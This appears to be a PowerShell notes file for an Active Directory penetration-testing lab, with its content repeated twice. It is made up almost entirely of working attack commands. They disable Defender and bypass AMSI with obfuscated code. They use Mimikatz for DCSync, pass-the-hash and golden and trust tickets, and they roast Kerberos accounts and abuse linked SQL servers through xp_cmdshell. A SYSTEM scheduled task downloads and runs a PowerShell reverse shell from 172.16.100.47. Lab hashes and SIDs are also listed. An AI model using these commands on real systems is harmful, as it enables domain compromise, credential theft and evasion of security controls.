htkcodes/commands.ps1

## commands.ps1
$session=New-PSSession –Computername Server1

Enter-PSSession $session

Set-MpPreference -DisableRealtimeMonitoring $true

Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections

$ExecutionContext.SessionState.LanguageMode
#Enum Applocker policy if you stumble upon constrained language mode


 Copy-Item .\Invoke-MimikatzEx.ps1 \\dcorpadminsrv.dollarcorp.moneycorp.local\c$\'Program Files'
Copy-Item <Path> <Destination>\c$\'Program Files'

#Ask for TGT from server using kekeo

tgt::ask /user:websvc /domain:dollarcorp.moneycorp.local /rc4:cc098f204c5887eaa8253e7c2749156f


#Ask for a TGS

tgs::s4u /tgt:TGT_dcorpadminsrv$@DOLLARCORP.MONEYCORP.LOCAL_krbtgt~dollarcorp.moneycorp.local@DOLLAR
CORP.MONEYCORP.LOCAL.kirbi /user:Administrator@dollarcorp.moneycorp.local
/service:time/dcorp-dc.dollarcorp.moneycorp.LOCAL|ldap/dcorpdc.dollarcorp.moneycorp.LOCAL

#PASS THE TICKET USING MIMKATZ
Invoke-Mimikatz -Command '"kerberos::ptt
TGS_Administrator@dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL_ldap~
dcorp-dc.dollarcorp.moneycorp.LOCAL@DOLLARCORP.MONEYCORP.LOCAL_ALT.kirbi"'
#dump lsass
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'

gwmi -Class win32_computersystem -ComputerName dcorpdc.dollarcorp.moneycorp.local

# find out services running with user accounts as the services running with machine accounts have difficult passwords
Get-NetUser -SPN

# Request ticket for the service
Add-Type -AssemblyNAme System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.loca

Get-DomainUser -PreauthNotRequired -Verbose

Set-DomainObject -Identity ControlXUser -XOR @ {useraccountcontrol=4194304} -Verbose

Get-DomainUser -PreauthNotRequired -Verbose -Identity Control47User
Get-ASREPHash -UserName VPN1user -Verbose


\\dcorp-dc.dollarcorp.moneycorp.local
Invoke-Mimikatz -Command '"sekurlsa::pth /domain:dcorpdc /user:Administrator /ntlm:a102ad5753f4c441e3af31c97fad86fd /run:powershell.exe"'
\\dcorp-appsrv.dollarcorp.moneycorp.local


schtasks /Run /S dcorp-dc.dollarcorp.moneycorp.local /TN "black47"

schtasks /create /S dcorp-dc.dollarcorp.moneycorp.local /SC Weekly /RU "NT Authority\SYSTEM" /TN "black47" /TR "powershell.exe -c 'iex(New-Object Net.WebClient).DownloadString(''http://172.16.100.47/Invoke-PowerShellTcp.ps1''')'';Power -Reverse -IPAddress 172.16.100.47 -Port 4444"
sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )


Set-MpPreference -DisableRealtimeMonitoring $true
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\mcorp$"'


Trust token - 776b4d2c86b0dd0c79cab6511728264f

domain sid - S-1-5-21-1874506631-3219952063-538504511

EA - SIDS - S-1-5-21-280534878-1496970234-700767426-519

EU EA SIDS - S-1-5-21-1652071801-1423090587-98612180-519


Get-NetGroup -Domain moneycorp.local -GroupName "Enterprise Admins" -FullData


Invoke-Mimikatz -Command '"lsadump::trust /patch"'

Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234-700767426-519 /rc4:776b4d2c86b0dd0c79cab6511728264f /service:krbtgt /target:eurocorp.local /ticket:C:\AD\Tools\kekeo_old\trust_tkt.kirbi"'


\Rubeus.exe asktgs /ticket:C:trust_tkt.kirbi /service:cifs/mcorp-dc.moneycorp.local /dc:mcorpdc.moneycorp.local /ptt


Invoke-Mimikatz -Command '"lsadump::trust /patch"'

Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid: S-1-5-21-1874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234-700767426-519 /rc4:433e7fd056a2b3512efb341590d7c436 /service:krbtgt /target:moneycorp.local /ticket:C:\AD\Tools\kekeo_old\trust_tkt.kirbi"'


Set-RemoteWMI -SamAccountName student47 -ComputerName dcorpdc.dollarcorp.moneycorp.local -namespace 'root\cimv2' -Verbose

\asktgs.exe C:\AD\Tools\kekeo_old\trust_tkt.kirbi CIFS/mcorp-dc.moneycorp.local

.\kirbikator.exe lsa .\CIFS.mcorp-dc.moneycorp.local.kirbi

ls \\mcorp-dc.moneycorp.local\c$


Get-SQLServerLink -Instance dcorp-mssql -Verbose

Get-SQLServerLinkCrawl -Instance dcorp-mssql -Verbose


Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query "exec master..xp_cmdshell 'whoami'"


select * from openquery("dcorp-sql1",'select * from openquery("dcorpm-gmt",''select * from openquery("eu-sql.eu.eurocorp.local",''''select @@version as version;exec master..xp_cmdshell "powershell whoami)'''')'')')
	$session=New-PSSession –Computername Server1

	Enter-PSSession $session

	Set-MpPreference -DisableRealtimeMonitoring $true

	Get-AppLockerPolicy -Effective \| select -ExpandProperty RuleCollections

	$ExecutionContext.SessionState.LanguageMode
	#Enum Applocker policy if you stumble upon constrained language mode


	Copy-Item .\Invoke-MimikatzEx.ps1 \\dcorpadminsrv.dollarcorp.moneycorp.local\c$\'Program Files'
	Copy-Item <Path> <Destination>\c$\'Program Files'

	#Ask for TGT from server using kekeo

	tgt::ask /user:websvc /domain:dollarcorp.moneycorp.local /rc4:cc098f204c5887eaa8253e7c2749156f



	#Ask for a TGS

	tgs::s4u /tgt:TGT_dcorpadminsrv$@DOLLARCORP.MONEYCORP.LOCAL_krbtgt~dollarcorp.moneycorp.local@DOLLAR
	CORP.MONEYCORP.LOCAL.kirbi /user:Administrator@dollarcorp.moneycorp.local
	/service:time/dcorp-dc.dollarcorp.moneycorp.LOCAL\|ldap/dcorpdc.dollarcorp.moneycorp.LOCAL

	#PASS THE TICKET USING MIMKATZ
	Invoke-Mimikatz -Command '"kerberos::ptt
	TGS_Administrator@dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL_ldap~
	dcorp-dc.dollarcorp.moneycorp.LOCAL@DOLLARCORP.MONEYCORP.LOCAL_ALT.kirbi"'
	#dump lsass
	Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'

	gwmi -Class win32_computersystem -ComputerName dcorpdc.dollarcorp.moneycorp.local

	# find out services running with user accounts as the services running with machine accounts have difficult passwords
	Get-NetUser -SPN

	# Request ticket for the service
	Add-Type -AssemblyNAme System.IdentityModel
	New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.loca

	Get-DomainUser -PreauthNotRequired -Verbose

	Set-DomainObject -Identity ControlXUser -XOR @ {useraccountcontrol=4194304} -Verbose

	Get-DomainUser -PreauthNotRequired -Verbose -Identity Control47User
	Get-ASREPHash -UserName VPN1user -Verbose



	\\dcorp-dc.dollarcorp.moneycorp.local
	Invoke-Mimikatz -Command '"sekurlsa::pth /domain:dcorpdc /user:Administrator /ntlm:a102ad5753f4c441e3af31c97fad86fd /run:powershell.exe"'
	\\dcorp-appsrv.dollarcorp.moneycorp.local


	schtasks /Run /S dcorp-dc.dollarcorp.moneycorp.local /TN "black47"

	schtasks /create /S dcorp-dc.dollarcorp.moneycorp.local /SC Weekly /RU "NT Authority\SYSTEM" /TN "black47" /TR "powershell.exe -c 'iex(New-Object Net.WebClient).DownloadString(''http://172.16.100.47/Invoke-PowerShellTcp.ps1''')'';Power -Reverse -IPAddress 172.16.100.47 -Port 4444"
	sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )


	Set-MpPreference -DisableRealtimeMonitoring $true
	Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\mcorp$"'


	Trust token - 776b4d2c86b0dd0c79cab6511728264f

	domain sid - S-1-5-21-1874506631-3219952063-538504511

	EA - SIDS - S-1-5-21-280534878-1496970234-700767426-519

	EU EA SIDS - S-1-5-21-1652071801-1423090587-98612180-519


	Get-NetGroup -Domain moneycorp.local -GroupName "Enterprise Admins" -FullData


	Invoke-Mimikatz -Command '"lsadump::trust /patch"'

	Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234-700767426-519 /rc4:776b4d2c86b0dd0c79cab6511728264f /service:krbtgt /target:eurocorp.local /ticket:C:\AD\Tools\kekeo_old\trust_tkt.kirbi"'




	\Rubeus.exe asktgs /ticket:C:trust_tkt.kirbi /service:cifs/mcorp-dc.moneycorp.local /dc:mcorpdc.moneycorp.local /ptt


	Invoke-Mimikatz -Command '"lsadump::trust /patch"'

	Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid: S-1-5-21-1874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234-700767426-519 /rc4:433e7fd056a2b3512efb341590d7c436 /service:krbtgt /target:moneycorp.local /ticket:C:\AD\Tools\kekeo_old\trust_tkt.kirbi"'


	Set-RemoteWMI -SamAccountName student47 -ComputerName dcorpdc.dollarcorp.moneycorp.local -namespace 'root\cimv2' -Verbose

	\asktgs.exe C:\AD\Tools\kekeo_old\trust_tkt.kirbi CIFS/mcorp-dc.moneycorp.local

	.\kirbikator.exe lsa .\CIFS.mcorp-dc.moneycorp.local.kirbi

	ls \\mcorp-dc.moneycorp.local\c$





	Get-SQLServerLink -Instance dcorp-mssql -Verbose

	Get-SQLServerLinkCrawl -Instance dcorp-mssql -Verbose


	Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query "exec master..xp_cmdshell 'whoami'"


	select * from openquery("dcorp-sql1",'select * from openquery("dcorpm-gmt",''select * from openquery("eu-sql.eu.eurocorp.local",''''select @@version as version;exec master..xp_cmdshell "powershell whoami)'''')'')')